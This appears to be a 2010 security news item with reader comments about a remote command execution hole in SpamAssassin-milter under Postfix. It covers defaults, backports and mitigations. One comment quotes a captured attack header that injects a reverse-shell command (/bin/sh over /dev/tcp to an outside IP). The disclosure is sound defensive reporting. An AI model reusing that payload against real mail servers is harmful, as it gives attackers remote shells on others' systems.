Weekly Edition
Return to the Security page
| |||||||||||||
|
| |||||||||||||
SpamAssassin-milter has a remote root vulnerability
SpamAssassin-milter
plugs SpamAssassin into mail agents which speak the "milter" protocol. It
is, evidently, trivially easy to get this
plugin to execute commands as root when it is used with Postfix in some
configurations, and possibly with other mailers as well. There is a bug tracker
entry where progress on a patch can be followed; the developers seem to
not be in a great hurry, despite the fact that exploits are circulating.
Sites using SpamAssassin-milter should probably just disable it for now.
(Thanks to Christof Damian).
(Log in to post comments)
SpamAssassin-milter has a remote root vulnerability Posted Mar 17, 2010 19:41 UTC (Wed) by dondelelcaro (subscriber, #28431) [Link]
In order for this to be a problem you have to have spamass-milter running as root (not the default in Debian) and using -x (also not the default). There's no reason to run spamass-milter as root at all (to use -x, you just add the user to smmsp). [This *is* a bug that needs to be fixed; I've already got a patch for it in my svn repository... I haven't uploaded it yet primarily because neither I nor upstream use -x, so I haven't had a chance to test it.]
SpamAssassin-milter has a remote root vulnerability Posted Mar 17, 2010 23:55 UTC (Wed) by ewen (subscriber, #4772) [Link]
From what I can see on my systems spamass-milter on Debian Lenny (ie, stable) will run spamass-milter as the spamass-milter user unless you try hard to do otherwise. Debian Etch (ie, oldstable) runs spamass-milter as root in the default init scripts. But "-x" isn't included in the default arguments. (This seems to be yet another reason to upgrade the last few old Debian Etch systems.)
Ewen
SpamAssassin-milter has a remote root vulnerability Posted Mar 18, 2010 2:11 UTC (Thu) by dondelelcaro (subscriber, #28431) [Link]
If you're still running etch, you can just install the backport of spamassassin 0.3.1-7 to etch, which doesn't have this problem. [I don't know if I'll make a security update for etch that isn't a backport, as those intervening versions have a few very useful patches.]
SpamAssassin-milter has a remote root vulnerability Posted Mar 18, 2010 2:24 UTC (Thu) by ewen (subscriber, #4772) [Link]
Thanks for the hint. Given that security support has already stopped for Etch I didn't expect this to be fixed in Etch, and was considering doing a backport from Lenny myself; it's very handy it's already done. Mostly I wanted to point out to people who still had Etch boxes that they couldn't just assume that Debian had always run spamass-milter in a non-root configuration.
For others: http://packages.debian.org/etch-backports/spamass-milter
Ewen
Then SpamAssassin-milter has a remote non-root vulnerability Posted Mar 18, 2010 3:13 UTC (Thu) by JoeBuck (subscriber, #2330) [Link] If a machine can be made to run arbitrary commands from a remote source as an ordinary user, that suffices for a botnet.
SpamAssassin-milter has a remote root vulnerability Posted Mar 19, 2010 21:34 UTC (Fri) by asherringham (subscriber, #33251) [Link]
I queried this today - seen in my Postfix logs this morning :
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"
Looks like an attempt via this vulnerability ... lucky I don't use this spamass-milter.
Alastair
|
|
||||||||||||